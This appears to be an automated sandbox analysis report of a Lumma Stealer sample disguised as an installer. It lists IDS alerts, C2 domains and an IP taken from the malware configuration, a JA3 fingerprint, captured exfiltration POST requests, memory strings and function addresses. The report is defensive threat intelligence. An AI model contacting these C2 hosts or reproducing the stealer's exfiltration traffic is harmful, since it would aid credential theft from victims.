Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49812 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49795 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49795 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49785 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49785 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: impossiblekdo.click

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49785 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49804 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49795 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49812 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49831 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49841 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49818 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49862 -> 188.114.97.3:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NF6WBP6EQRJE0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12812Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JEN5G7VEOKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15036Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UBVFDPPBR0X0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20538Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TWLP9VBGNLT8UVUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 971Host: impossiblekdo.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=A334Y2C3OX8ZBVTGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570271Host: impossiblekdo.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: impossiblekdo.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: impossiblekdo.click

Source: Installer_x64.exe	String found in binary or memory: http://127.0.0.1:%d/samplinginconsis
Source: Installer_x64.exe	String found in binary or memory: http://127.0.0.1:%d/samplinginconsistent
Source: Installer_x64.exe, 00000000.00000002.2335092399.000000000B812000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:5778/sampling
Source: Installer_x64.exe, 00000000.00000002.2335092399.000000000B812000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:5778/sampling09AZ__az
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Installer_x64.exe	String found in binary or memory: http://stackoverflow.com/questions/19345392/why-arent-my-parameters-getting-passed-through-to-a-disp
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: BitLockerToGo.exe, 00000003.00000003.2382198320.00000000054CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: Installer_x64.exe	String found in binary or memory: https://developers.google.com/protocol-buffers/docs/reference/go/faq#namespace-conflictMemory
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Installer_x64.exe	String found in binary or memory: https://github.com/bjoerge/quickreload/blob/master/client.js
Source: BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: BitLockerToGo.exe, 00000003.00000003.2401202101.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453636157.0000000002F31000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2381558219.0000000002FFA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2381625476.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400793234.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2370650545.00000000054A6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/
Source: BitLockerToGo.exe, 00000003.00000003.2410777871.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/..
Source: BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/E
Source: BitLockerToGo.exe, 00000003.00000002.2453829098.0000000002FC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/H
Source: BitLockerToGo.exe, 00000003.00000003.2410890655.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453636157.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2381929951.0000000002FE5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400793234.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/api
Source: BitLockerToGo.exe, 00000003.00000003.2410777871.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415123560.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2420712545.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2448860817.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453829098.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415772893.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/api$V
Source: BitLockerToGo.exe, 00000003.00000003.2400854150.00000000054A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/apiF
Source: BitLockerToGo.exe, 00000003.00000003.2381585077.0000000002FE5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/apid
Source: BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/ks
Source: BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/pi
Source: BitLockerToGo.exe, 00000003.00000002.2454276330.00000000054A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click/s
Source: BitLockerToGo.exe, 00000003.00000003.2410777871.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2401202101.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415123560.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2420712545.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2448860817.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2453829098.0000000002FCE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2415772893.0000000002FCD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2400793234.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2396721217.0000000002F75000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://impossiblekdo.click:443/api
Source: BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: BitLockerToGo.exe, 00000003.00000003.2383484499.0000000002FFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BitLockerToGo.exe, 00000003.00000003.2359366893.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359440172.00000000054D8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2359308789.00000000054DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: BitLockerToGo.exe, 00000003.00000003.2383212818.00000000055CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49812 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49841 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_00437A50 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00437A50

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 3_2_00437A50 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00437A50

Source: Installer_x64.exe, 00000000.00000002.2333986045.0000000001155000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: le)CLSIDFromStringCOMPRESS_HIPROCCOMPRESS_LOPROCCallWindowProcWCardinality(%d)ContainingOneofCosta Rica (le)CreateErrorInfoCreateHardLinkWCreatePopupMenuCreateWindowExWCustomAttributeDeviceIoControlDialogBoxParamWDllCanUnloadNowDragAcceptFilesDrawThemeTextExDuplicateHandleEFI ApplicationExcludeClipRectExecutableImageExtensionRangesFailed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGC (fractional)Gateway TimeoutGdiplusShutdownGetActiveObjectGetActiveWindowGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetDpiForWindowGetEnhMetaFileWGetModuleHandleGetMonitorInfoWGetProcessTimesGetRawInputDataGetSecurityInfoGetStartupInfoWGetTextMetricsWGetThreadLocaleGot version 2 !Guadeloupe (la)Hanifi_RohingyaHitachi SH3 DSPImpersonateSelfImportEntrySizeIndonesian (id)Indon

memstr_5785bbb8-1

Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC98BA2	0_3_0BC98BA2
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCC3B70	0_3_0BCC3B70
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB1ADE	0_3_0BCB1ADE
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA7A80	0_3_0BCA7A80
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCABA59	0_3_0BCABA59
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCAFA53	0_3_0BCAFA53
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCBCA50	0_3_0BCBCA50
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC95A69	0_3_0BC95A69
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB6A00	0_3_0BCB6A00
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB3A17	0_3_0BCB3A17
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC869D0	0_3_0BC869D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9D9F0	0_3_0BC9D9F0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCC19A0	0_3_0BCC19A0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB48C0	0_3_0BCB48C0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC8E880	0_3_0BC8E880
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCC3890	0_3_0BCC3890
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC88840	0_3_0BC88840
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC81F90	0_3_0BC81F90
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCBCF90	0_3_0BCBCF90
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA5F72	0_3_0BCA5F72
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC84F10	0_3_0BC84F10
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC95F2C	0_3_0BC95F2C
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCC1EBD	0_3_0BCC1EBD
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9CE10	0_3_0BC9CE10
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC87DD0	0_3_0BC87DD0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB1DD2	0_3_0BCB1DD2
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC82D80	0_3_0BC82D80
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC8CD4E	0_3_0BC8CD4E
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9AD42	0_3_0BC9AD42
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC91D50	0_3_0BC91D50
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCBFD50	0_3_0BCBFD50
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC8DCE0	0_3_0BC8DCE0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC99CE0	0_3_0BC99CE0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCBBCE0	0_3_0BCBBCE0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC88C80	0_3_0BC88C80
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9BC97	0_3_0BC9BC97
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB4C40	0_3_0BCB4C40
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA1C70	0_3_0BCA1C70
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB6C70	0_3_0BCB6C70
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC85C00	0_3_0BC85C00
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA9C01	0_3_0BCA9C01
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB33C6	0_3_0BCB33C6
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC853D0	0_3_0BC853D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCBB3D0	0_3_0BCBB3D0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC82350	0_3_0BC82350
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCA2350	0_3_0BCA2350
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB0360	0_3_0BCB0360
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCB1311	0_3_0BCB1311
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCAF293	0_3_0BCAF293
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCAB218	0_3_0BCAB218
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC84230	0_3_0BC84230
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BCC31C0	0_3_0BCC31C0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC8A1E0	0_3_0BC8A1E0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC9D1E0	0_3_0BC9D1E0
Source: C:\Users\user\Desktop\Installer_x64.exe	Code function: 0_3_0BC91155	0_3_0BC91155
